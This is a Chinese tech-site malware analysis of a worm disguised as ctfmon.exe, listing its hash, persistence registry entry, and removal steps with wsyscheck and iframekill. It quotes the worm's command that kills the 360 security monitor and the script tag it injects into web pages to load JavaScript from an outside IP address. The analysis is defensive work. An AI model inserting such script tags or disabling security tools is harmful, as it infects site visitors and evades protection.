科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道蠕虫ctfmon.exe病毒分析解决

蠕虫ctfmon.exe病毒分析解决

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

下面看看ctfmon.exe的分析,1、断开网络,使用wsyscheck终止并删除伪ctfmon.exe。2、使用wsyscheck删除ctfmon的开机启动项。
  • 评论
  • 分享微博
  • 分享邮件

下面看看ctfmon.exe的分析:

文件名称:ctfmon.exe
文件大小:45,056 字节
AV命名:Win32.HLLW.Rubbish (Dr.Web v4.44);
Worm.Win32.Downloader.c (kav 7.0.0.125)

加壳方式:N/A
编写语言:Microsoft Visual C++ 6.0
病毒类型:蠕虫
文件MD5:6ede432a957fbbba10e2284819fe8d6e
传播方式:网页漏洞


行为分析:

1.释放批处理:
%Systemroot%\system32\tmipo.bat (24 字节)
用记事本打开
.可见 taskkill /im 360tray.exe
然后进程cmd启动conime.exe。

2.修改注册表,添加开机启动项
注册表键: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注册表值: svchost
类型: REG_SZ
值:      C:\Documents and Settings\Administrator\桌面\ctfmon.exe
注:值为ctfmon.exe的所在路径

3.激活批处理tmipo.bat终止360安全卫士实时监控程序
命令行 taskkill /im 360tray.exe

4.然
后svchost.exe启动wmiprvse.exe -Embedding
命令行:C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding

5.连接网络 218.75.91.248

6.遍历磁盘,查找*.htm、*.PHP、*.ASP等网页文件,插入一段JS代码:
<script language=javascript src=http://218.75.91.248/qq.js></script>

解决方法:
1、断开网络,使
用wsyscheck终止并删除伪ctfmon.exe

2、使用wsyscheck删除ctfmon的开机启动项
 
3、使用iframekill清除被插入代码的网页
    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章